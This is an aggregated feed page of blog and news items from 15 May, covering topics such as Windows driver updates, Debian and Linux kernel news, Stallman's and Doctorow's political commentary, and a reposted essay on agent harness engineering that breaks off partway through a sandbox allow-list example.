Friday, 15 May

21:49

Microsoft claims it’s fixing Windows Update so it won’t downgrade your graphics drivers [OSnews]

One of the top pieces of customer feedback in the graphics driver area is clear: “Windows Update downgrades my drivers.” Today, we are announcing a policy change to how display drivers are published through Windows Update — allowing 2-Part HWID + Computer Hardware ID (CHID) targeting for new devices. This change gives customers more control over their display driver of choice while preserving OEM control over the devices they ship.

↫ Garrettd at Microsoft’s Hardware Dev Center

Windows Update randomly downgrading your graphics drivers seems to be a common enough occurrence that its supposed fix deserves its own feature announcement and blog post. This is a real operating system that runs on most of the world’s PCs.

19:21

Adjacency [Penny Arcade]

It would never have occurred to me in a million years to unearth Cheeto of all things, it's completely nuts. My instinct was to say "cracked" but that means something different to the youth of today - something illicit, an etymological spur I've always feared was Fortnite-derived. But it was requested by the shivering mutants on Tumblr, and we are honor-bound to elevate these dreams, yea, unto the material world.

18:28

Urgent: Protect against datamining and manipulative fintech [Richard Stallman's Political Notes]

US citizens: call on Congress to Oppose H.R. 4801 and Protect Against datamining and manipulative fintech.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

I urge you to edit the letter's subject and text to remove the term "AI" and replace it with "snooping and manipulative fintech" or something else that rejects the marketing hype. For good measure, you could critique the term "AI" -- I did that too.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: No Kill Switches in Cars Act [Richard Stallman's Political Notes]

US citizens: Support H.R. 1137, the "No Kill Switches in Cars Act."

I think that if someone is convicted of driving under the influence, or something close to that, it is legitimate to attach a sensor-driven kill switch to stop per from driving while inebriated.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: End FISA law's spying on Americans [Richard Stallman's Political Notes]

US citizens: call on Congress to put an end to the FISA law's permission for warrantless spying on Americans.

The FISA court was supposed to prevent abuse of this power, but it has announced that the constraints on its operation made that impossible in practice.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Corporate campaign against federal heat standard for workers [Richard Stallman's Political Notes]

*New Report Reveals Coordinated Corporate Campaign Against Life-Saving Federal Heat Standard for Workers.*

California's rule requiring businesses to protect their workers, with rest breaks and access to water and shade, is a big help, and extending it nationwide could avoid thousands of illnesses (some of them fatal) per year.

UK millionaires happy to pay more tax [Richard Stallman's Political Notes]

*Three-quarters of UK millionaires would be happy to pay more tax, research finds.*

Israelis-only road through the West Bank [Richard Stallman's Political Notes]

Israel is about to start building an Israelis-only road through the West Bank, designed as an excuse to exclude Palestinians from all the other roads in a central region of the West Bank — and force them all out.

Warning of domination of US government by rich [Richard Stallman's Political Notes]

Woodrow Wilson warned in his campaign in 1912 about the domination of the US government by a few rich people, and called for stripping them of their power.

At the same time, he pressured actively for racial segregation.

It is impossible to simplify Wilson to pure good or pure evil: we need to recognize both at once, in different areas of life, and judge each of them as it deserves.

JP Morgan on tax increases for foreign banks [Richard Stallman's Political Notes]

The boss of JP Morgan, a giant US bank, praises UK officials as "smart" when they reduce taxes for big foreign banks like his, and tries to threaten them with "investing less" if they might increase taxes for big foreign banks.

He is one of the arrogant rich men that Woodrow Wilson warned about. He is an enemy of Britain, and Britain should treat him as an enemy.

He is an enemy of America, too, for the same reason.

17:49

Link [Scripting News]

I wish they had an outliner in Claude. I would use it. ;-)

Link [Scripting News]

BTW, here's the JSONL version of Scripting News. It has the same data as the RSS file, but in the format that AI apps are looking for, so I am told. I thought I'd try to kick this off by pushing an RSS flow through the pipe. It's like using the Grateful Dead to boot up podcasting. I needed something to put out on the wire and I had this feed handy.

Link [Scripting News]

Thinking about adding <source:inReplyTo> to the source namespace. Its value is a URL, by default, and has an optional isPermaLink attribute, a boolean, to indicate if it's not a permalink. Works just like the guid element in RSS 2.0. I will also add support for that in the FeedLand database, and flow it out through the socket interface. Actually that's pretty close to a full spec, at least in rss.land where we take simplicity seriously. ;-)
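A sketch of what producing that element might look like, with the caveat that everything here is my assumption rather than the finished spec: the namespace URI, the example URL, and the `in_reply_to` helper are all hypothetical, and the guid-style rule (attribute defaults to true, so it is only written when the value is not a permalink) is inferred from the RSS 2.0 guid element the post compares it to.

```python
import xml.etree.ElementTree as ET

# Assumption: a placeholder namespace URI; the real source namespace may differ.
SOURCE_NS = "http://source.scripting.com/"
ET.register_namespace("source", SOURCE_NS)

def in_reply_to(item: ET.Element, url: str, is_permalink: bool = True) -> ET.Element:
    """Attach a hypothetical <source:inReplyTo> element to an RSS <item>.

    Mirrors guid semantics: isPermaLink defaults to true, so the attribute
    is only emitted when the value is NOT a permalink."""
    el = ET.SubElement(item, f"{{{SOURCE_NS}}}inReplyTo")
    el.text = url
    if not is_permalink:
        el.set("isPermaLink", "false")
    return el

# Hypothetical item and URL, purely for illustration.
item = ET.Element("item")
in_reply_to(item, "http://scripting.com/2026/05/15.html#a170000")
xml_out = ET.tostring(item, encoding="unicode")
```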

17:07

The case of the Create­File­Mapping that always reported ERROR_ALREADY_EXISTS [The Old New Thing]

A customer reported that whenever their program called Create­File­Mapping to create a named file mapping, the call succeeded, but the resulting mapping was not the size they wanted. They requested a 64KB mapping, but the mapping they got back was only 4KB, which they noticed because the program crashed once it accessed the 4097th byte. As an additional data point, if they called Get­Last­Error() after creating the file mapping, they got ERROR_ALREADY_EXISTS, suggesting that the file mapping had already been created. But this happened even the first time their program was run, and even immediately after a reboot, so there shouldn't have been any leftover mappings.

HANDLE h = CreateFileMappingW(INVALID_HANDLE_VALUE, // backed by the paging file
            nullptr, PAGE_READWRITE, 0, 65536, L"MyFileMapping");

My guess is that they are getting ERROR_ALREADY_EXISTS because the mapping already exists. (Quelle surprise!)

After a fresh reboot, the customer used Process Explorer to search all processes to see if any of them already had a handle to their file mapping, and lo and behold, they found one: It was some companion software for their webcam, and it chose the exact same uncreative file mapping name.

The customer appended a GUID to their file mapping name, thereby removing the possibility of an accidental name collision. (Of course, there is still the possibility of an intentional name collision. Not much you can do to protect yourself against an attacker at the same or higher privilege.)
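The naming fix can be sketched in a few lines. This is only an illustration of the idea, not the customer's code (their change was in the C++ call above), and the GUID here is a made-up value: in practice you generate one at development time and hard-code it, so every instance of your program still agrees on the name while no unrelated program plausibly picks it.

```python
import uuid

# Hypothetical, fixed GUID generated once at development time and baked into
# the program. All instances of this program share the same mapping name;
# an unrelated program will not accidentally choose it.
APP_GUID = uuid.UUID("6f1c9e2a-8b3d-4c5e-9f0a-1d2e3c4b5a69")

# The decorated kernel-object name, e.g. for CreateFileMappingW.
MAPPING_NAME = f"MyFileMapping-{{{APP_GUID}}}"
```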

Related reading: You can name your car, and you can name your kernel objects, but there is a qualitative difference between the two.

The post The case of the CreateFileMapping that always reported ERROR_ALREADY_EXISTS appeared first on The Old New Thing.

17:00

Dave's vibe coding amusement park [Scripting News]

I reached a point in my Claude work where now I can do vibe coding, in a world that I used to just be a programmer in. This means if I want to do a heavy lift, I can tell Claude what I want and it can do really big corner turns, which is something I am (as a human) terrible at, and thus resist. Today I redesigned the basic user interface of the app, and didn't read any code, I was just giving orders, and it was doing what I asked, even if every little thing it did would have been a full day's work. It's remarkable how it can do very complex things in a few seconds.

And the web framework I'm working on can do almost all the things I want to do for now, but I want to suck everything into it, and turn the whole thing into a vibe coding amusement park. So many projects I want to do, and so many I want to do with you.

16:21

Bits from Debian: New Debian Developers and Maintainers (March and April 2026) [Planet Debian]

The following contributors got their Debian Developer accounts in the last two months:

  • Filip Strömbäck (fstromback)
  • Arthur Diniz (arthurbd)
  • Manuel Traut (manut)
  • Xiyue Deng (manphiz)
  • kpcyrd (kpcyrd)

The following contributors were added as Debian Maintainers in the last two months:

  • Chris Talbot
  • Gabriel Filion
  • Mate Kukri

Congratulations!

16:07

[$] Controlling memory-management with BPF [LWN.net]

Roman Gushchin began his session in the memory-management track of the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit by saying that the community has seen a lot of proposals adding BPF-based interfaces for memory management. None of them have made their way into the mainline, though. He wanted to explore the ways in which BPF might be helpful and the obstacles that have kept BPF-based solutions out so far. This session was followed by a discussion led by Shakeel Butt on what the requirements for a new, BPF-based interface for memory control groups might look like.

15:49

Flowermaxxing Friday [Whatever]

That’s right y’all, you’re getting another flower picture! I know, I can hardly believe it myself, but spring is just turning out so beautifully here and I just feel so compelled to share the blossoms with you.

Today’s bloom is a peony (I think), from a peony bush along the side of the house:

A large, fully opened, beautiful pink peony flower.

I am thrilled to have another beautiful blooming plant in the yard, especially because it’s pink! It’s actually very close to where the wisteria is, too. Also this one is in the shape of a heart:

A peony blossom that has opened up in a way that it very closely resembles a heart. It pretty much looks just like the pink heart emoji.

That genuinely made me smile so much while I was taking the photo. Like, how cute is that.

I hope y’all are having a great start to your weekend, and that you see many blooms this spring!

-AMS

14:49

Error'd: Balmenach Bad Gateway Single Malt [The Daily WTF]

"Winner ad placement!" snarked our Peter G.


Errors on this website are always a shoo-in for the weekly column. An anonymous reader wrote "I got error 500 when I tried to submit an Error'd. Please make the file uploader check if the attached file is within the file upload limit, which I think is less than 4 MB." They shared an audio error'd which may be coming along next week.


"Give us feedback - wait, did it work at all?" confused poor I_Absolutely_Want_To_Give F. "As every good service management company, ServiceNow wants feedback, above all."


"0 minutes does not equal 0 seconds..." sagely summarized Daniel D. "Claude like floors. I mean floor. But maybe ceil would be better applicable to this calculation, right?"


Finally, this one is a real novelty, from Adam R. Is the label actually 27 years old? It certainly could be; Error 502 is a good bit older. But I think this would be our oldest Error'd yet. Adam explained: "This appears to be a real auction for a whiskey bottle whose label does, in fact, say Error 502 Bad Gateway on it. The winning bid: £130. Source: https://www.scotchwhiskyauctions.com/auctions/228-the-179th-auction/876095-balmenach-1998-27-year-old-error-502-bad-gateway-thompson-bros/"


[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

14:35

Seven new stable kernels with patches for CVE-2026-46333 [LWN.net]

Greg Kroah-Hartman has announced the 7.0.8, 6.18.31, 6.12.89, 6.6.139, 6.1.173, 5.15.207, and 5.10.256 stable kernels. These kernels contain a patch for CVE-2026-46333, a vulnerability reported by the Qualys Security Advisory team, though Jann Horn proposed a patch back in 2020. A proof-of-concept exploit for the vulnerability has already been published. Some of the kernels have additional patches for other bugs; as always, users are advised to upgrade.

[$] HugeTLB preservation over live update [LWN.net]

Recent times have seen a lot of effort put into the implementation of the kexec handover and live update orchestrator features in the Linux kernel. But that work is not yet complete. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, Pratyush Yadav led a memory-management-track session on adding the ability to preserve hugetlbfs-provided memory during the live-update process.

Security updates for Friday [LWN.net]

Security updates have been issued by Debian (ffmpeg, gsasl, nodejs, postgresql-15, postgresql-17, python3.9, and thunderbird), Fedora (expat, firefox, freerdp, GitPython, kernel, php, rust-podman-sequoia, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-openpgp, rust-sequoia-sop, rust-sequoia-sq, and rust-sequoia-sqv), Mageia (awstats, libreoffice, perl-HTTP-Tiny, and tomcat), Oracle (corosync, freerdp, gimp, git-lfs, glib2, jq, kernel, krb5, libsoup3, libtiff, openexr, thunderbird, uek-kernel, and yggdrasil), Red Hat (podman and skopeo), SUSE (amazon-ssm-agent, avahi, c-ares, cairo, containerd, cpp-httplib, dnsmasq, dovecot24, ffmpeg-4, firefox, helm, ImageMagick, iproute2, kernel, krb5, libtpms, ongres-scram, ongres-stringprep, plexus-testing, maven, maven-doxia, mojo-parent, sisu, openCryptoki, openssh, perl-Text-CSV_XS, php8, python-lxml, python-Twisted-doc, python311-click, python311-GitPython, rclone, regclient, and syncthing), and Ubuntu (avahi).

13:42

Pluralistic: No one wants a permanent gerontocracy (15 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links



The Supreme Court building, with the justices seated before it. The justices float, disembodied, their skins tinted green, their skulls shining through their faces. The court is tilted at a spooky angle. Behind it loom dark clouds and a glowing moon.

No one wants a permanent gerontocracy (permalink)

Perhaps the most demoralizing part of Trumpismo is the fear that the people around you are so cruel and senseless that they approve of the violence, the racism, the pig-ignorant lies and rampant theft:

https://www.techdirt.com/2025/07/08/who-goes-maga/

One of the things keeping me going in these dark days is the pollster G. Elliott Morris, whose "Strength in Numbers" newsletter is a reliable, robust and nuanced source of information about the way other people – including Trump's base – feel about him from moment to moment. Reading items like "A reminder: Very few people support Donald Trump's presidency" makes it easier to get through the day:

https://www.gelliottmorris.com/p/a-reminder-very-few-people-support

It's a very good piece, breaking down the collapse in support for Trumpismo and confidence in Trump's mental health, even among the people who have historically stood by him, even though – incredibly! – about a third of Americans still support him and believe in his fitness to rule.

But the most interesting part of this post is the eye-popping poll result on a question that is only incidentally about Trump: the extremely broad, bipartisan support for both age limits and term limits for the House, the Senate, the Presidency and the Supreme Court.

How broad and bipartisan are these results?

  • 80% of Americans want age limits in the House and Senate (D78%, R83%, I79%);
  • Most Americans want age limits for the presidency (R73%, I61%); the most popular age limit is 79;
  • Most Americans (65%) want an 18-year term limit for Supreme Court justices;
  • Most Americans (79%) want age limits for Supreme Court justices.

As Morris writes, this represents "a level of cross-partisan agreement that’s almost unheard of on a high-salience issue."

There are different ways to parse this out. The past decade has shown that, in the absence of a hard rule to the contrary, incumbents will stay in office long after it's obvious they should step down. That was true of Biden, who continued to campaign for a presidential term long after it was obvious that he was no longer physically and mentally capable of doing the job.

It was true of Ruth Bader Ginsburg, whose commitment to the symbolic value of having her successor appointed by the first woman president allowed Trump to appoint the monstrous Amy Coney Barrett to a lifetime on the Supreme Court, which could well last another 30 years. It was true of Antonin Scalia, who would have handed a Supreme Court pick to the Obama administration if it wasn't for Mitch McConnell's willingness to steal a seat for Neil Gorsuch.

It's true of Kay Granger, a sitting congresswoman whose staff hid the fact that her dementia had progressed to the point that she had to be moved to an assisted living facility – while still holding office:

https://www.politico.com/news/magazine/2025/03/14/kay-granger-dementia-dc-media-00210317

It was true of Gerry Connolly, who insisted that he – not AOC – should be the head of the Oversight Committee, despite the fact that he was dying of cancer:

https://www.pbs.org/newshour/politics/rep-gerry-connolly-announces-return-of-cancer-steps-down-as-top-oversight-democrat

It was true of Dianne Feinstein, who continued to serve in the Senate despite having advanced dementia:

https://www.motherjones.com/politics/2023/04/sen-dianne-feinsteins-saga-is-a-very-public-example-of-a-national-crisis/

These politicians are wed to a system of seniority and patronage that insists that everyone who "pays their dues" should get a turn. It's a system that relies on politicians banking favors from their peers and then paying them back by anointing successors, thus requiring politicians to serve until they are ready to choose that successor.

We have created a system in which no one dares to hand over power, because to do so is to unilaterally disarm, while the other side keeps their permanent gerontocrats in positions of authority. Not only does this system starve the pipeline of young politicians who can progress to fill those new roles, it also exposes each party to significant risk. If your majority rests on a handful of seats and your caucus includes a dozen people who are actuarially certain to die soon, then the whole system could be upended by a couple of highly likely blood-clots:

https://pluralistic.net/2023/07/01/designated-survivors/

It's not that every politician over the age of 70 (or 80, or 85) is incapable of doing the job: it's that a system that runs on a mix of incumbency advantage, seniority, patronage and hubris is a bad system and the only fix for it is to put hard limits on terms – both based on how many years you hold office, and how many years you walk the earth.

The system where everyone who pays their dues gets a turn was never going to work, and that should have been especially obvious to the system's longest-tenured participants, who've had decades to notice how long-lived their colleagues are, and to compare those lifespans to the number of committee chairs, senate seats and other treasures there are to be had in the halls of power.

There are lots of good ideas – like abolishing the Electoral College or limiting political spending – that are popular with a majority of Americans, but these ideas are often very unpopular with conservatives:

https://pluralistic.net/2023/10/18/the-people-no/#tell-ya-what-i-want-what-i-really-really-want

But this is a realm in which – as Morris says – there is "almost unheard-of…cross-partisan agreement." It's the one idea that all Americans – including older Americans (at least the ones who aren't in the House, Senate or Oval Office, or on the Supreme Court) – agree on: rule by permanent gerontocracy is bad, and should end.

In not so many months, both parties are going to have to pick their next presidential candidates (in the case of Republicans, it may be sooner, depending on Trump's cheeseburger intake). Those primary contests are going to implicitly raise the issue of whether we should be ruled according to the principle of "everyone who pays their dues gets a turn." But a shrewd politician could win a lot of favor among voters (and fury among their colleagues) by campaigning on age- and term-limits for high office.

(Image: Pacamah, CC BY-SA 4.0, modified)


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago The life of a celeb PA https://www.theguardian.com/education/2001/may/14/highereducation.comment

#20yrsago DOJ moves in dark of night to quash EFF wiretapping lawsuit https://web.archive.org/web/20060524092447/https://www.eff.org/deeplinks/archives/004659.php

#20yrsago WolfenGitmo: Guantanamo Bay mod for Castle Wolfenstein https://web.archive.org/web/20060520203517/https://a.parsons.edu/~evan/school/?q=node/29

#20yrsago Where does booing come from? https://web.archive.org/web/20181215223044/https://slate.com/news-and-politics/2006/05/where-do-hecklers-come-from.html

#15yrsago Steven Levy on Facebook’s ironic privacy charge against Google https://web.archive.org/web/20110514121727/https://www.wired.com/epicenter/2011/05/facebook-privacy-problems/

#15yrsago Michael Moore’s “Some Final Thoughts on the Death of Osama bin Laden” https://web.archive.org/web/20110513181408/https://www.michaelmoore.com/words/mike-friends-blog/some-final-thoughts-on-death-of-osama-bin-laden

#15yrsago DHS’s “Secure Communities” program will deport battered woman for calling 9-1-1 on her abuser https://web.archive.org/web/20110514142235/https://blogs.ocweekly.com/navelgazing/2011/05/isaura_garcia_battered_secure.php

#15yrsago TSA: we’ll search your baby and it will make the country safer https://www.loweringthebar.net/2011/05/tsa-says-baby-frisking-justified.html

#10yrsago Telcoms companies try to rescue TV by imposing Internet usage caps on cord-cutters https://www.techdirt.com/2016/05/13/isps-are-now-forcing-cord-cutters-to-subscribe-to-tv-if-they-want-to-avoid-usage-caps/

#10yrsago The weird, humiliating nicknames George W Bush gave to everyone https://en.wikipedia.org/wiki/List_of_nicknames_used_by_George_W._Bush

#10yrsago “Tendril perversion”: when one loop of a coil goes the other way https://en.wikipedia.org/wiki/Tendril_perversion

#10yrsago Clicking “Buy now” doesn’t “buy” anything, but people think it does https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2778072

#5yrsago Uber (Ch)eats https://pluralistic.net/2021/05/13/uber-cheats/#50-companies

#5yrsago The Democratic establishment https://pluralistic.net/2021/05/13/uber-cheats/#party-bosses

#1yrago Who Broke the Internet? Part II https://pluralistic.net/2025/05/13/ctrl-ctrl-ctrl/#free-dmitry


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Staehle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), First Second, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, First Second, April 20, 2027

  • "The Memex Method," Farrar, Straus and Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

13:07

Agent Harness Engineering [Radar]

This article was originally published on Addy Osmani’s blog. It’s being reposted here with the author’s permission.

Roughly: Anytime you find an agent makes a mistake, you take the time to engineer a solution such that the agent never makes that mistake again.

We’ve spent the last two years arguing about models. Which one is smartest, which one writes the cleanest React, which one hallucinates less. That conversation is fine as far as it goes, but it’s missing the other half of the system. The model is one input into a running agent. The rest is the harness: the prompts, tools, context policies, hooks, sandboxes, subagents, feedback loops, and recovery paths wrapped around the model so it can actually finish something.

A decent model with a great harness beats a great model with a bad harness. I’ve watched this play out on my own work over and over. And increasingly the interesting engineering isn’t in picking the model; it’s in designing the scaffolding around it.

That discipline now has a name. Viv Trivedy coined the term harness engineering, and his “Anatomy of an Agent Harness” post is the cleanest derivation of what a harness actually is and why each piece exists. Dex Horthy has been tracking the pattern as it emerges. HumanLayer frames most agent failures as “skill issues” that come down to configuration rather than model weights. Anthropic’s engineering team has published what I think is the best public breakdown of how to design a harness for long-running work. And Birgitta Böckeler has a good overview of what this looks like from the user’s side.

This post is my attempt to pull those threads together.

What is a harness, really?

Viv’s one-liner does most of the work:

Agent = Model + Harness. If you’re not the model, you’re the harness.

A harness is every piece of code, configuration, and execution logic that isn’t the model itself. A raw model is not an agent. It becomes one once a harness gives it state, tool execution, feedback loops, and enforceable constraints.

The model is one chip on the board. The harness is everything else that makes it useful.

Concretely, a harness includes:

  • System prompts, CLAUDE.md, AGENTS.md, skill files, and subagent prompts
  • Tools, skills, MCP servers, and their descriptions
  • Bundled infrastructure (filesystem, sandbox, browser)
  • Orchestration logic (subagent spawning, handoffs, model routing)
  • Hooks and middleware for deterministic execution (compaction, continuation, lint checks)
  • Observability (logs, traces, cost and latency metering)

Simon Willison reduces the loop part to its essence: an agent is a system that “runs tools in a loop to achieve a goal.” The skill is in the design of both the tools and the loop.
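Willison's "tools in a loop" reduces to a very small program. Here's a minimal sketch of that shape with the model stubbed out: a real harness would call an LLM API where `fake_model` sits, and the tool set, action format, and transcript handling are all my invention, not any particular product's.

```python
from typing import Callable

Tool = Callable[[str], str]

def run_agent(model, tools: dict[str, Tool], goal: str, max_steps: int = 10) -> str:
    """Reason -> act via a tool -> observe -> repeat, until the model finishes."""
    transcript = [f"GOAL: {goal}"]
    for _ in range(max_steps):
        action = model(transcript)                 # reason: pick next action
        if action["type"] == "final":
            return action["text"]                  # goal reached
        observation = tools[action["tool"]](action["arg"])   # act
        transcript.append(f"{action['tool']}({action['arg']}) -> {observation}")  # observe
    return "gave up"

# Scripted stand-in for a model: one tool call, then a final answer.
def fake_model(transcript):
    if len(transcript) == 1:
        return {"type": "tool", "tool": "read", "arg": "notes.txt"}
    return {"type": "final", "text": "done: " + transcript[-1]}

tools = {"read": lambda path: f"<contents of {path}>"}
result = run_agent(fake_model, tools, "summarize notes.txt")
```

Everything outside the model call here – the transcript, the tool table, the step cap – is harness.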

If that sounds like a lot of surface area, it is. And it’s your surface area, not the model provider’s. Claude Code, Cursor, Codex, Aider, Cline: These are all harnesses. The model underneath is sometimes the same, but the behavior you experience is dominated by what the harness does.

coding agent = AI model(s) + harness

This equation, articulated by Viv and echoed by HumanLayer, is where the work actually lives. The debate over the left-hand side is loud. Most of the actual leverage sits on the right.

The “skill issue” reframe

There’s a pattern I watch engineers fall into. The agent does something dumb, the engineer blames the model, and the blame gets filed under “wait for the next version.”

The harness-engineering mindset rejects that default. The failure is usually legible. The agent didn’t know about a convention, so you add it to AGENTS.md. The agent ran a destructive command, so you add a hook that blocks it. The agent got lost in a 40-step task, so you split it into a planner and an executor. The agent kept “finishing” broken code, so you wire a typecheck back-pressure signal into the loop.
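The "hook that blocks it" piece can be sketched concretely. This is a hypothetical pre-tool-use hook, not any specific product's API: the deny patterns are illustrative, and in the ratchet spirit each one would trace back to a command an agent actually tried.

```python
import re

# Illustrative deny patterns; each grows out of a real observed failure.
DENY = [
    r"\brm\s+-rf\s+/",          # recursive delete from the filesystem root
    r"\bgit\s+push\s+--force",  # history rewrite on a shared branch
    r"\bDROP\s+TABLE\b",        # destructive SQL reaching production
]

def allow_command(cmd: str) -> bool:
    """Return False if the proposed shell command matches a deny pattern.
    A harness would call this before executing any agent-issued command."""
    return not any(re.search(p, cmd, re.IGNORECASE) for p in DENY)
```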

HumanLayer says: “It’s not a model problem. It’s a configuration problem.” Harness engineering is what happens when you take that seriously.

There’s a striking data point that shows up in both Viv’s write-up and HumanLayer’s. On Terminal Bench 2.0, Claude Opus 4.6 running inside Claude Code scores far lower than the same model running in a custom harness. Viv’s team moved a coding agent from Top 30 to Top 5 by changing only the harness. Models get posttraining coupled to the harness they were trained against. Moving them into a different harness, with better tools for your codebase, a tighter prompt, and sharper backpressure, can unlock capability the original harness was leaving on the floor.

This is the opposite of the “just wait for GPT-6” narrative. The gap between what today’s models can do and what you see them doing is largely a harness gap.

The ratchet: Every mistake becomes a rule

The most important habit in harness engineering is treating agent mistakes as permanent signals. Not one-off stories to laugh about, not “bad runs” to retry. Signals.

If the agent ships a PR with a commented-out test and I merge it by accident, that’s an input. The next version of my AGENTS.md says “never comment out tests; delete them or fix them.” The next version of my precommit hook greps for .skip( and xit( in the diff. The next version of my reviewer subagent flags commented-out tests as a blocker.
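The pre-commit grep described above might look like this. The patterns are illustrative (Jest/Mocha-style `.skip(` and `xit(`), and the diff format assumed is ordinary unified diff, where added lines start with a single `+`.

```python
import re

# Disabled-test markers to flag; extend as new failures are observed.
DISABLED_TEST = re.compile(r"\.skip\(|\bxit\(")

def disabled_tests_in_diff(diff: str) -> list[str]:
    """Return added lines in a unified diff that introduce disabled tests."""
    return [
        line for line in diff.splitlines()
        if line.startswith("+")
        and not line.startswith("+++")      # skip the file-header line
        and DISABLED_TEST.search(line)
    ]

sample = """\
+++ b/app.test.js
+it('works', () => {})
+it.skip('flaky thing', () => {})
 xit('old, untouched', () => {})
"""
offenders = disabled_tests_in_diff(sample)
```

Note that the untouched `xit(` line is ignored: the hook only blocks what the current change introduces.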

You only add constraints when you’ve seen a real failure. You only remove them when a capable model has made them redundant. Every line in a good AGENTS.md should be traceable back to a specific thing that went wrong.

This is also why harness engineering is a discipline rather than a framework. The right harness for your codebase is shaped by your failure history. You can’t download it.

Working backward from behavior

The framing from Viv that I find most useful when I’m actually designing a harness is to start from the behavior you want and derive the harness piece that delivers it. His pattern: behavior we want (or want to fix) → harness design to help the model achieve this.

Every harness feature is a bridge across a specific thing the model can't do on its own

The useful thing about deriving it this way is that every harness component has a specific job. If you can’t name the behavior a component exists to deliver, it probably shouldn’t be there.

The rest of this section walks the pieces in roughly the order Viv does, with the specific patterns I’ve found worth stealing.

Filesystem and Git: Durable state

The filesystem is the most foundational primitive, and it tends to be underrated because it’s boring. Models can only directly operate on what fits in context. Without a filesystem, you’re copy-pasting into a chat window, and that isn’t a workflow.

Once you have a filesystem, the agent gets a workspace to read data, code, and docs; a place to offload intermediate work instead of holding it in context; and a surface where multiple agents and humans can coordinate through shared files. Adding Git on top gives you versioning for free, so the agent can track progress, roll back errors, and branch experiments.

Most of the other harness primitives end up pointing at the filesystem for something.

Bash and code execution: The general-purpose tool

The main agent loop today is a ReAct loop: The model reasons, takes an action via a tool call, observes the result, and repeats. But a harness can only execute the tools it has logic for. You can try to prebuild a tool for every possible action, or you can give the agent bash and let it build the tools it needs on the fly.

Willison’s take on this is that agents already excel at shell commands; most tasks collapse to a few well-chosen CLI invocations. Harnesses still ship focused tools, but bash plus code execution has become the default general-purpose strategy for autonomous problem solving. It’s the difference between teaching someone to use a single kitchen gadget and handing them a kitchen.
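
A minimal version of that loop is easy to sketch. Everything here is illustrative: `call_model` stands in for a real LLM call, and the action protocol (a dict with a `type` field) is an assumption, not any vendor's API:

```python
import subprocess

def run_bash(command: str) -> str:
    # The one general-purpose tool: run shell, capture whatever comes back.
    result = subprocess.run(command, shell=True, capture_output=True,
                            text=True, timeout=60)
    return result.stdout + result.stderr

def react_loop(task: str, call_model, max_steps: int = 10) -> str:
    transcript = [f"Task: {task}"]
    for _ in range(max_steps):
        step = call_model("\n".join(transcript))  # reason + choose an action
        if step["type"] == "final":
            return step["answer"]
        observation = run_bash(step["command"])   # act
        transcript.append(f"$ {step['command']}\n{observation}")  # observe
    return "max steps exceeded"
```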

Sandboxes and default tooling

Bash is only useful if it runs somewhere safe. Running agent-generated code on your laptop is risky, and a single local environment doesn’t scale to many parallel agents.

Sandboxes give agents an isolated operating environment. Instead of executing locally, the harness connects to a sandbox to run code, inspect files, install dependencies, and verify work. You can allow-list commands, enforce network isolation, spin up new environments on demand, and tear them down when the task is done.
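
A command allow-list is simple to sketch. The command set below is invented for illustration; a real sandbox policy would also scope the filesystem and network:

```python
import shlex

# Illustrative allow-list; a real one is derived from what your agents
# actually need and from your failure history.
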